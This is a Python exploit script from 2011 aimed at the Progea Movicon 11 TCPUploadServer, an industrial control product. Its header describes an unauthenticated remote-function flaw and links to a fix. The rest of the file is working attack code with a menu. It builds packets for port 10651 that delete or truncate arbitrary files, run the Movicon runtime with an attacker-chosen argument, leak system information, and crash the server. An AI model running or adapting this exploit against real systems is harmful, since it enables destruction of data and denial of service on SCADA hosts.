#!/usr/bin/python# movi.py# Progea Movicon TCPUploadServer Remote Exploit# Jeremy Brown / jbrown at patchtuesday dot org# Mar 2011## TCPUploadServer allows remote users to execute functions on the server# without any form of authentication. Impacts include deletion of arbitrary# files, execution of a program with an arbitrary argument, crashing the# server, information disclosure, and more. This design flaw puts the host# running this server at risk of potentially unauthorized functions being# executed on the system.## Tested on Progea Movicon 11 TCPUploadServer running on Windows## Fix: http://support.progea.com/download/Mov11.2_Setup.zip#
import sys
import socket
hdr="MovX"
funcs=(1,2,3,4,5,6,7,8)# "B" is listed as 8 only for convience. other functions include (the real) 8, 9, A, and Vif len(sys.argv)<3:
print "Progea Movicon TCPUploadServer Remote Exploit"
print "Usage: %s <target> <function> [data]"%sys.argv[0]
print "\nWhat would you like to do?\n"
print "[1] Create a folder"
print "[2] Overwrite a file with NULL and cause 100%% CPU"
print "[3] Delete a file"
print "[4] Execute moviconRunTime.exe with a specified argument"
print "[5] Create a desktop shortcut"
print "[6] Retrieve drive information"
print "[7] Retrieve os service pack"
print "[8] Crash the server\n"
print "* Default data is \"test\""
sys.exit(0)
target=sys.argv[1]
port=10651
cs=target,port
func=int(sys.argv[2])if len(sys.argv)==4:
data=sys.argv[3]else:
data="test"if func not in funcs:
print "Invalid function"
sys.exit(1)if(func==1):
print "Crafting a packet to create the folder \"%s\"..."%data
pkt=hdr+"1"+"B"+data+"\x00"*(66-len(data))
elif(func==2):
print "Crafting a packet to truncate (or create) the file \"%s\" to 0 bytes and cause 100%% CPU..."%data
pkt=hdr+"2"+"B"+data+"\x00"*(66-len(data))# O_RDWR|O_CREAT|O_TRUNC, might be more to this, it's supposedly a copy function, but i'm moving on
elif(func==3):
print "Crafting a packet to delete the file \"%s\"..."%data
pkt=hdr+"3"+"B"+data+"\x00"*(66-len(data))
elif(func==4):
print "Crafting a packet to execute moviconRunTime.exe with the argument \"%s\"..."%data
pkt=hdr+"4"+"BB"+data+"\x00"*(65-len(data))
elif(func==5):
print "Crafting a packet to create a desktop shortcut with the name (also appended to the link path) \"%s\"..."%data
pkt=hdr+"5"+"B"+data+"\x00"*(66-len(data))
elif(func==6):
print "Crafting a packet to retrieve drive information..."
pkt=hdr+"6"+"\x01"
elif(func==7):
print "Crafting a packet to retrieve os service pack..."
pkt=hdr+"7"+"\x00"
elif(func==8):
print "Crafting a packet to crash the server..."
pkt=hdr+"B"+"\x00"
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect(cs)
sock.send(pkt)
sock.send(pkt)
print "\nPacket sent!"if((func==6)|(func==7)):
info=sock.recv(128)if(info):
print "\nRetrieved info:\n"if(func==6):
print "%s"%info[6:]
elif(func==7):
print "%s"%info[22:]else:
print "\nNo info"
sock.close()
